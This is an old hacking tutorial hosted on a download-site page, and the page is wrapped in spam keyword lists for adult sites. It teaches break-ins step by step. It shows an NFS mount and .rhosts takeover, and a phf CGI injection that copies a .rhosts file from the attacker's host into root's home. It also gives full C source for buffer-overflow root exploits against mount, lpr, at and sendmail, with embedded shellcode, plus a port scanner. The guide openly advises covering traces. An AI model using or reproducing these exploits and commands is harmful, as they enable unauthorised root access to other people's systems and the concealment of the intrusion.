亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關(guān)于我們
? 蟲蟲下載站

?? the newbies-user's guide to hacking.txt

?? a collection of mega hacking tools
?? TXT
?? 第 1 頁 / 共 4 頁
字號:
			       User's guide			__________________________Well, howdi folks... I guess you are all wondering who's this guy (me)that's trying to show you a bit of everything... ?Well, I ain't telling you anything of that...Copyright, and other stuff like this (below).Copyright and stuff...______________________If you feel offended by this subject (hacking) or you think that you coulddo better, don't read the below information...This file is for educational purposes ONLY...;)I ain't responsible for any damages you made after reading this...(I'm very serious...)So this can be copied, but not modified (send me the changes, and if theyare good, I'll include them ).Don't read it, 'cuz it might be illegal.I warned you...If you would like to continue, press <PgDown>.			Intro: Hacking step by step._________________________________________________________________________________Well, this ain't exactely for begginers, but it'll have to do.What all hackers has to know is that there are 4 steps in hacking...Step 1: Getting access to site.Step 2: Hacking r00t.Step 3: Covering your traces.Step 4: Keeping that account.Ok. In the next pages we'll see exactely what I ment.Step 1: Getting access._______Well folks, there are several methods to get access to a site.I'll try to explain the most used ones.The first thing I do is see if the system has an export list:mysite:~>/usr/sbin/showmount -e victim.site.comRPC: Program not registered.If it gives a message like this one, then it's time to search another wayin.What I was trying to do was to exploit an old security problem by mostSUN OS's that could allow an remote attacker to add a .rhosts to a usershome directory... (That was possible if the site had mounted their homedirectory.Let's see what happens...mysite:~>/usr/sbin/showmount -e victim1.site.com/usr  victim2.site.com/home (everyone)/cdrom (everyone)mysite:~>mkdir /tmp/mountmysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/mysite:~>ls -sal /tmp/mount   total 9   1 drwxrwxr-x   8 root     root         1024 Jul  4 20:34 ./   1 drwxr-xr-x  19 root     root         1024 Oct  8 13:42 ../   1 drwxr-xr-x   3 at1      users        1024 Jun 22 19:18 at1/   1 dr-xr-xr-x   8 ftp      wheel        1024 Jul 12 14:20 ftp/   1 drwxrx-r-x   3 john     100          1024 Jul  6 13:42 john/   1 drwxrx-r-x   3 139      100          1024 Sep 15 12:24 paul/   1 -rw-------   1 root     root          242 Mar  9  1997 sudoers   1 drwx------   3 test     100          1024 Oct  8 21:05 test/   1 drwx------  15 102      100          1024 Oct 20 18:57 rapper/  Well, we wanna hack into rapper's home.mysite:~>iduid=0 euid=0mysite:~>whoamirootmysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwdWe use /bin/csh 'cuz bash leaves a (Damn!) .bash_history  and you mightforget it on the remote server...mysite:~>su - rapperWelcome to rapper's user.mysite:~>ls -lsa /tmp/mount/   total 9   1 drwxrwxr-x   8 root     root         1024 Jul  4 20:34 ./   1 drwxr-xr-x  19 root     root         1024 Oct  8 13:42 ../   1 drwxr-xr-x   3 at1      users        1024 Jun 22 19:18 at1/   1 dr-xr-xr-x   8 ftp      wheel        1024 Jul 12 14:20 ftp/   1 drwxrx-r-x   3 john     100          1024 Jul  6 13:42 john/   1 drwxrx-r-x   3 139      100          1024 Sep 15 12:24 paul/   1 -rw-------   1 root     root          242 Mar  9  1997 sudoers   1 drwx------   3 test     100          1024 Oct  8 21:05 test/   1 drwx------  15 rapper   daemon       1024 Oct 20 18:57 rapper/So we own this guy's home directory...mysite:~>echo "+ +" > rapper/.rhostsmysite:~>cd /mysite:~>rlogin victim1.site.comWelcome to Victim.Site.Com.SunOs ver....(crap).victim1:~$This is the first method...Another method could be to see if the site has an open 80 port. That wouldmean that the site has a web page.(And that's very bad, 'cuz it usually it's vulnerable).Below I include the source of a scanner that helped me when NMAP wasn't written.(Go get it at http://www.dhp.com/~fyodor. Good job, Fyodor).NMAP is a scanner that does even stealth scanning, so lots of systems won'trecord it./* -*-C-*- tcpprobe.c *//* tcpprobe - report on which tcp ports accept connections *//* IO ERROR, error@axs.net, Sep 15, 1995 */#include <stdio.h>#include <sys/socket.h>#include <netinet/in.h>#include <errno.h>#include <netdb.h>#include <signal.h>int main(int argc, char **argv){  int probeport = 0;  struct hostent *host;  int err, i, net;  struct sockaddr_in sa;  if (argc != 2) {    printf("Usage: %s hostname\n", argv[0]);    exit(1);  }  for (i = 1; i < 1024; i++) {    strncpy((char *)&sa, "", sizeof sa);    sa.sin_family = AF_INET;    if (isdigit(*argv[1]))      sa.sin_addr.s_addr = inet_addr(argv[1]);    else if ((host = gethostbyname(argv[1])) != 0)      strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr);    else {      herror(argv[1]);      exit(2);    }    sa.sin_port = htons(i);    net = socket(AF_INET, SOCK_STREAM, 0);    if (net < 0) {      perror("\nsocket");      exit(2);    }    err = connect(net, (struct sockaddr *) &sa, sizeof sa);    if (err < 0) {      printf("%s %-5d %s\r", argv[1], i, strerror(errno));      fflush(stdout);    } else {      printf("%s %-5d accepted.                               \n", argv[1], i);      if (shutdown(net, 2) < 0) {	perror("\nshutdown");	exit(2);      }    }    close(net);  }  printf("                                                                \r");  fflush(stdout);  return (0);}Well, now be very carefull with the below exploits, because they usually getlogged.Besides, if you really wanna get a source file from /cgi-bin/ use thissintax : lynx http://www.victim1.com//cgi-bin/fingerIf you don't wanna do that, then do a :mysite:~>echo "+ +" > /tmp/rhostsmysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+/root/.rhosts" | nc -v - 20 victim1.site.com 80then mysite:~>rlogin -l root victim1.site.comWelcome to Victim1.Site.Com.victim1:~#Or, maybe, just try to find out usernames and passwords...The usual users are "test", "guest", and maybe the owner of the site...I usually don't do such things, but you can...Or if the site is really old, use that (quote site exec) old bug forwu.ftpd.There are  a lot of other exploits, like the remote exploits (innd, imap2,pop3, etc...) that you can find at rootshell.connectnet.com or atdhp.com/~fyodor. Enough about this topic. (besides, if you can finger the site, you canfiggure out usernames and maybe by guessing passwords (sigh!) you could getaccess to the site).Step 2: Hacking r00t.______First you have to find the system it's running...a). LINUXALL versions:A big bug for all linux versions is mount/umount and (maybe) lpr./* Mount Exploit for Linux, Jul 30 1996::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````""::::::::::::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::::::::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ :::::::::::::...........:::...........:::...........::.......:......:.......:::::::::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::Discovered and Coded by Bloodmask & VioCovin Security 1996*/#include <unistd.h>#include <stdio.h>#include <stdlib.h>#include <fcntl.h>#include <sys/stat.h>#define PATH_MOUNT "/bin/mount"#define BUFFER_SIZE 1024#define DEFAULT_OFFSET 50u_long get_esp(){  __asm__("movl %esp, %eax");}main(int argc, char **argv){  u_char execshell[] =   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";   char *buff = NULL;   unsigned long *addr_ptr = NULL;   char *ptr = NULL;   int i;   int ofs = DEFAULT_OFFSET;   buff = malloc(4096);   if(!buff)   {      printf("can't allocate memory\n");      exit(0);   }   ptr = buff;   /* fill start of buffer with nops */   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));   ptr += BUFFER_SIZE-strlen(execshell);   /* stick asm code into the buffer */   for(i=0;i < strlen(execshell);i++)      *(ptr++) = execshell[i];   addr_ptr = (long *)ptr;   for(i=0;i < (8/4);i++)      *(addr_ptr++) = get_esp() + ofs;   ptr = (char *)addr_ptr;   *ptr = 0;   (void)alarm((u_int)0);   printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");   execl(PATH_MOUNT, "mount", buff, NULL);}/*LPR exploit:I don't know the author...*/#include <stdio.h>#include <stdlib.h>#include <unistd.h>#define DEFAULT_OFFSET          50#define BUFFER_SIZE             1023long get_esp(void){   __asm__("movl %esp,%eax\n");}void main(){   char *buff = NULL;   unsigned long *addr_ptr = NULL;   char *ptr = NULL;   u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"                        "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"                        "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"                        "\xd7\xff\xff\xff/bin/sh";   int i;   buff = malloc(4096);   if(!buff)   {      printf("can't allocate memory\n");      exit(0);   }   ptr = buff;   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));   ptr += BUFFER_SIZE-strlen(execshell);   for(i=0;i < strlen(execshell);i++)      *(ptr++) = execshell[i];   addr_ptr = (long *)ptr;   for(i=0;i<2;i++)      *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;   ptr = (char *)addr_ptr;   *ptr = 0;   execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);}b.) Version's 1.2.* to 1.3.2NLSPATH env. variable exploit:/* It's really annoying for users and good for me... AT exploit gives only uid=0 and euid=your_usual_euid.*/#include <unistd.h>#include <stdio.h>#include <stdlib.h>#include <fcntl.h>#include <sys/stat.h>#define path "/usr/bin/at"#define BUFFER_SIZE 1024#define DEFAULT_OFFSET 50u_long get_esp(){  __asm__("movl %esp, %eax");}main(int argc, char **argv){  u_char execshell[] =   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";   char *buff = NULL;   unsigned long *addr_ptr = NULL;   char *ptr = NULL;   int i;   int ofs = DEFAULT_OFFSET;   buff = malloc(4096);   if(!buff)   {      printf("can't allocate memory\n");      exit(0);   }   ptr = buff;   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));   ptr += BUFFER_SIZE-strlen(execshell);   for(i=0;i < strlen(execshell);i++)      *(ptr++) = execshell[i];   addr_ptr = (long *)ptr;   for(i=0;i < (8/4);i++)      *(addr_ptr++) = get_esp() + ofs;   ptr = (char *)addr_ptr;   *ptr = 0;   (void)alarm((u_int)0);   printf("AT exploit discovered by me, _PHANTOM_ in 1997.\n");   setenv("NLSPATH",buff,1);   execl(path, "at",NULL);}SENDMAIL exploit: (don't try to chmod a-s this one... :) )/* SENDMAIL Exploit for Linux*/#include <unistd.h>#include <stdio.h>#include <stdlib.h>#include <fcntl.h>#include <sys/stat.h>#define path "/usr/bin/sendmail"#define BUFFER_SIZE 1024#define DEFAULT_OFFSET 50u_long get_esp(){  __asm__("movl %esp, %eax");}main(int argc, char **argv){  u_char execshell[] =   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff./sh";   char *buff = NULL;   unsigned long *addr_ptr = NULL;   char *ptr = NULL;   int i;   int ofs = DEFAULT_OFFSET;   buff = malloc(4096);   if(!buff)   {      printf("can't allocate memory\n");      exit(0);   }   ptr = buff;   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));   ptr += BUFFER_SIZE-strlen(execshell);   for(i=0;i < strlen(execshell);i++)      *(ptr++) = execshell[i];   addr_ptr = (long *)ptr;   for(i=0;i < (8/4);i++)      *(addr_ptr++) = get_esp() + ofs;   ptr = (char *)addr_ptr;   *ptr = 0;   (void)alarm((u_int)0);   printf("SENDMAIL exploit discovered by me, _PHANTOM_ in  1997\n");   setenv("NLSPATH",buff,1);   execl(path, "sendmail",NULL);}MOD_LDT exploit (GOD, this one gave such a headache to my Sysadmin (ROOT)

?? 快捷鍵說明

復(fù)制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
eeuss鲁一区二区三区| 日韩av一区二区三区四区| 国产精品一区在线观看乱码| 日韩三级视频在线观看| 激情综合色综合久久综合| 精品国产一区二区三区四区四| 99精品视频一区二区| 亚洲一线二线三线视频| 欧美精品日韩一本| 另类的小说在线视频另类成人小视频在线 | 美女视频黄免费的久久| 精品美女被调教视频大全网站| 国产成人免费在线观看| 1024精品合集| 欧美日韩精品一区二区三区四区| 日日骚欧美日韩| 久久嫩草精品久久久精品一| 成人精品小蝌蚪| 亚洲一区二区在线播放相泽| 日韩一本二本av| av亚洲产国偷v产偷v自拍| 亚洲大型综合色站| 久久这里只有精品视频网| 成人黄色在线网站| 日韩黄色小视频| 中文字幕巨乱亚洲| 91麻豆精品国产91久久久资源速度 | 欧美精品一区二区在线播放| 丁香啪啪综合成人亚洲小说| 亚洲一区二区三区免费视频| 亚洲精品一区二区三区在线观看| 91老师片黄在线观看| 蜜桃视频在线一区| 亚洲男人的天堂一区二区| 精品动漫一区二区三区在线观看| 色中色一区二区| 久久精品久久综合| 亚洲黄一区二区三区| 久久午夜羞羞影院免费观看| 欧美综合亚洲图片综合区| 国产成人精品免费| 日韩国产在线观看| 亚洲精品视频自拍| 国产午夜亚洲精品午夜鲁丝片| 欧美午夜精品一区| 懂色av噜噜一区二区三区av| 免费成人小视频| 亚洲蜜臀av乱码久久精品| 亚洲精品一区二区三区香蕉| 欧美亚洲国产一区在线观看网站| 麻豆成人免费电影| 亚洲精品视频观看| 久久夜色精品国产噜噜av| 国产呦萝稀缺另类资源| 亚洲精品乱码久久久久| 精品欧美一区二区在线观看| 色哟哟一区二区在线观看| 精品在线观看免费| 亚洲图片欧美视频| 国产欧美视频一区二区| 91精品综合久久久久久| 93久久精品日日躁夜夜躁欧美| 免费视频最近日韩| 亚洲mv在线观看| 中文一区二区在线观看| 欧美激情自拍偷拍| 日韩美女天天操| 欧美日韩国产欧美日美国产精品| 成人永久免费视频| 狠狠色狠狠色合久久伊人| 午夜精品久久久久久久99樱桃| 国产精品美女视频| 久久久91精品国产一区二区精品 | 日本不卡一二三| 亚洲激情男女视频| 国产精品麻豆99久久久久久| 日韩一级精品视频在线观看| 欧美日本视频在线| 欧美无人高清视频在线观看| 本田岬高潮一区二区三区| 国内精品伊人久久久久av影院| 日韩福利视频导航| 石原莉奈在线亚洲二区| 亚洲国产一区二区在线播放| 亚洲免费av高清| 亚洲欧美日韩成人高清在线一区| 国产精品午夜在线| 国产精品免费久久| 日韩三级电影网址| 日韩一区二区免费视频| 欧美疯狂性受xxxxx喷水图片| 欧美午夜一区二区| 欧美午夜一区二区| 欧美性感一区二区三区| 欧美最猛黑人xxxxx猛交| 色哟哟一区二区| 91福利国产成人精品照片| 色婷婷综合久久久| 欧美在线视频全部完| 欧洲精品视频在线观看| 91网页版在线| 欧美日韩国产大片| 91精品免费观看| 欧美日韩你懂的| 日韩一级免费一区| 久久久www成人免费无遮挡大片| 26uuu国产电影一区二区| 久久免费电影网| 中文字幕乱码久久午夜不卡| 国产精品灌醉下药二区| 亚洲一区二区三区四区五区黄| 天堂成人国产精品一区| 日日夜夜免费精品视频| 国产一二三精品| 99久久精品国产毛片| 欧美性猛交xxxxxxxx| 欧美一区二区三区色| 国产蜜臀97一区二区三区| 亚洲品质自拍视频网站| 青青草原综合久久大伊人精品 | 老司机一区二区| 国产成人精品免费视频网站| 国产成人激情av| 91免费观看视频| 欧美人xxxx| 国产日韩综合av| 一区二区三区四区视频精品免费| 日日摸夜夜添夜夜添国产精品| 国内外成人在线视频| 色偷偷久久一区二区三区| 日韩欧美中文字幕制服| 中文文精品字幕一区二区| 亚洲丝袜另类动漫二区| 日韩av网站在线观看| 不卡一区在线观看| 日韩美一区二区三区| 亚洲免费色视频| 国产在线观看一区二区| 在线观看www91| 久久日韩粉嫩一区二区三区| 亚洲夂夂婷婷色拍ww47| 韩国v欧美v日本v亚洲v| 欧美视频在线观看一区二区| 中文幕一区二区三区久久蜜桃| 午夜国产不卡在线观看视频| 国产成人精品免费网站| 91精品国产综合久久久蜜臀图片| 欧美高清在线精品一区| 蜜臀av性久久久久蜜臀aⅴ流畅 | 一区二区三区免费网站| 国内成+人亚洲+欧美+综合在线| 91国产免费看| 日本一区二区三区视频视频| 日本不卡一区二区三区 | fc2成人免费人成在线观看播放| 欧美一级在线免费| 欧美韩国日本综合| 青青草原综合久久大伊人精品 | 亚洲欧美区自拍先锋| 久久99精品久久久久| 91久久免费观看| 久久久久99精品一区| 久草在线在线精品观看| 5858s免费视频成人| 国产精品美女一区二区三区| 久久狠狠亚洲综合| 欧美一区二区不卡视频| 亚洲午夜精品久久久久久久久| 国产主播一区二区三区| 精品剧情在线观看| 喷水一区二区三区| 欧美日本不卡视频| 一级中文字幕一区二区| 99精品久久99久久久久| 日韩欧美国产一区在线观看| 奇米精品一区二区三区四区| 欧美日韩aaaaaa| 午夜在线成人av| 欧美亚洲免费在线一区| 一区二区三区欧美| 在线观看亚洲a| 中文字幕一区二区三区四区 | 国产精品亚洲人在线观看| 国产亚洲污的网站| 国产成人在线电影| 久久精品日产第一区二区三区高清版| 美女诱惑一区二区| 久久久亚洲高清| 高清国产一区二区| 中文字幕在线播放不卡一区| 成人av在线播放网址| 国产精品久久久久久久久免费相片 | 亚洲国产精品激情在线观看| 国产99精品视频| 中文字幕制服丝袜一区二区三区| 91香蕉视频污在线| 亚洲综合视频在线| 欧美一区日本一区韩国一区| 日本成人在线视频网站| 中文字幕av一区二区三区|